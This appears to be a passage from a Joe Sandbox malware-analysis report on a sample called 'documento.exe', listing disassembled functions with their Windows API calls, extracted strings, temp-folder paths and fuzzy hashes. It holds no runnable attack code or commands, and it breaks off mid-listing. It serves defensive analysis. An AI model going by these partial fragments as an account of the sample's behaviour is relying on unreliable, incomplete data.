                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N$.1
                                                • API String ID: 1638840714-160380670
                                                • Opcode ID: 7ea715c16600e50fe963d9e75a28cfa408fbc2d9e4a6c680b4b0ab3cb37f0c4b
                                                • Instruction ID: c4f70692a945eeac8c46a5cc4d62b09966a4cf856849f89cf4e80ba5cf8d6073
                                                • Opcode Fuzzy Hash: 7ea715c16600e50fe963d9e75a28cfa408fbc2d9e4a6c680b4b0ab3cb37f0c4b
                                                • Instruction Fuzzy Hash: 0D0250B0A00209AFDB10DF54DC85AAE7BB5FB84315F10817AF611B62E1C7789D42CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404320 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                • lstrcmpiA.KERNEL32(: Completed,Fortrstningsfuldere7 Setup: Completed,00000000,?,?), ref: 00404487
                                                • lstrcatA.KERNEL32(?,: Completed), ref: 00404493
                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                  • Part of subcall function 004054D7: GetDlgItemTextA.USER32 ref: 004054EA
                                                  • Part of subcall function 00405F68: CharNextA.USER32(?), ref: 00405FC0
                                                  • Part of subcall function 00405F68: CharNextA.USER32(?), ref: 00405FCD
                                                  • Part of subcall function 00405F68: CharNextA.USER32(?), ref: 00405FD2
                                                  • Part of subcall function 00405F68: CharPrevA.USER32(?,?), ref: 00405FE2
                                                • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,00000001,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                • MulDiv.KERNEL32 ref: 0040457E
                                                  • Part of subcall function 004046D7: lstrlenA.KERNEL32(Fortrstningsfuldere7 Setup: Completed,Fortrstningsfuldere7 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                  • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                  • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,Fortrstningsfuldere7 Setup: Completed), ref: 00404790
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Deinotherium$Fortrstningsfuldere7 Setup: Completed$.1
                                                • API String ID: 2624150263-1499438407
                                                • Opcode ID: 70b1a66212ab45d461a1c2dd106845162ae904b35f6b36dac720ae7181b22bd9
                                                • Instruction ID: 52af94dd87b45bde8ff603abcb7252099f64fe51c68325ad3ba2cad582a3dd3a
                                                • Opcode Fuzzy Hash: 70b1a66212ab45d461a1c2dd106845162ae904b35f6b36dac720ae7181b22bd9
                                                • Instruction Fuzzy Hash: A8A18DB1900209ABDB11AFA5DC45BEFB6B8EF84314F14843BF611B62D1D77C8A418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040559F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileA.KERNEL32(?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C8
                                                • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405610
                                                • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405631
                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405637
                                                • FindFirstFileA.KERNEL32(00420D28,?,?,?,00409014,?,00420D28,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405648
                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                • FindClose.KERNEL32(00000000), ref: 00405706
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$(B$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3729200865
                                                • Opcode ID: 76fae8bbb7bc2a2dd328f8ab0c889fa2fda85575c1e0b5dccef8fc518a416506
                                                • Instruction ID: 8f0c06671bf428c0f48d088e48fc2575de732930cf6b83f410cedc31bee7f7b4
                                                • Opcode Fuzzy Hash: 76fae8bbb7bc2a2dd328f8ab0c889fa2fda85575c1e0b5dccef8fc518a416506
                                                • Instruction Fuzzy Hash: 2051D330800A04BADB21AB618D45BBF7BB8DF82714F54457BF445721D2C73C4982DE6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040402B Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B6
                                                • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                • SendMessageA.USER32 ref: 004040E8
                                                • GetSysColor.USER32 ref: 004040F9
                                                • SendMessageA.USER32 ref: 00404108
                                                • SendMessageA.USER32 ref: 00404117
                                                • lstrlenA.KERNEL32(?), ref: 0040411A
                                                • SendMessageA.USER32 ref: 00404129
                                                • SendMessageA.USER32 ref: 0040413E
                                                • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                • SendMessageA.USER32 ref: 004041A3
                                                • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                • SendMessageA.USER32 ref: 0040420E
                                                • LoadCursorA.USER32 ref: 0040421D
                                                • SetCursor.USER32(00000000), ref: 00404226
                                                • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404239
                                                • LoadCursorA.USER32 ref: 00404246
                                                • SetCursor.USER32(00000000), ref: 00404249
                                                • SendMessageA.USER32 ref: 00404275
                                                • SendMessageA.USER32 ref: 00404289
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: : Completed$N$open$.1
                                                • API String ID: 3615053054-1848776308
                                                • Opcode ID: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                • Instruction ID: 13510805d6fd3d88b19762a43a0fb8d51a409b78b81c3afae21fa77130ec6155
                                                • Opcode Fuzzy Hash: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                • Instruction Fuzzy Hash: 8A61B4B1A40205BFEB109F61DC45F6A7B69FB44751F10807AFB04BA2D1C7B8A951CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                • Instruction ID: 162af80c0e370fc685607c2eff3bc6c1c184a7d325dd4572e54487cb40a4b06a
                                                • Opcode Fuzzy Hash: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                • Instruction Fuzzy Hash: 67419B71804249AFCF058FA4CD459AFBBB9FF44310F00812AF551AA1A0C738EA51DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A46 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                • CloseHandle.KERNEL32(00000000), ref: 00405A79
                                                • GetShortPathNameA.KERNEL32 ref: 00405A82
                                                  • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                  • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                                • wsprintfA.USER32 ref: 00405ABD
                                                • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                • CloseHandle.KERNEL32(00000000), ref: 00405BAD
                                                  • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\documento.exe,80000000,00000003), ref: 00405974
                                                  • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %s=%s$NUL$[Rename]
                                                • API String ID: 222337774-4148678300
                                                • Opcode ID: b91d4fce54392df2e97de7bc6d207c8acd76fc29859b80508349f43d92bd930d
                                                • Instruction ID: ba38e0c37d2c4a0677a1b8c3a3e2c5b81f52bfc6e6322859571237bcba2cc6eb
                                                • Opcode Fuzzy Hash: b91d4fce54392df2e97de7bc6d207c8acd76fc29859b80508349f43d92bd930d
                                                • Instruction Fuzzy Hash: E5310271A05A19ABD2202B219C49F6B3AACDF45754F14043AFD01B62D2D6BCBD018EBD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405F68 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • "C:\Users\user\Desktop\documento.exe", xrefs: 00405FA4
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F69
                                                • *?|<>/":, xrefs: 00405FB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-199968148
                                                • Opcode ID: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                • Instruction ID: ae1ae60f73f04b2279d28dd2d3a2e9c8876d1ac92d72727c270a9fd7cf783979
                                                • Opcode Fuzzy Hash: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                • Instruction Fuzzy Hash: 75119451908B932DEB3216254C44BBB7F99CF56760F18047BE9C4722C2D6BC9C429B7D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004053DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                • GetLastError.KERNEL32 ref: 00405433
                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                • GetLastError.KERNEL32 ref: 00405452
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: ,s@$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                • API String ID: 3449924974-2910368180
                                                • Opcode ID: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                • Instruction ID: 949b07086bfbcc12ad21f83970ad7e8279e58ae06bb45438fc5c1603e332b0fc
                                                • Opcode Fuzzy Hash: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                • Instruction Fuzzy Hash: 2D010871D14259EADF119BA0DD447EFBFB8EB04355F004176E904B6181E3789648CFAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F49 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                • Instruction ID: 69fcdb6fe5d9844d1d3a4f02655feb6370c96159658ebf8fe0858d801e39bc44
                                                • Opcode Fuzzy Hash: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                • Instruction Fuzzy Hash: 5A215471904705ABCB219F78DD48F4BBFF8AF01715B048A29F895E22E0D735EA04CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004047E1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                • MulDiv.KERNEL32 ref: 00402BC5
                                                • wsprintfA.USER32 ref: 00402BD5
                                                • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
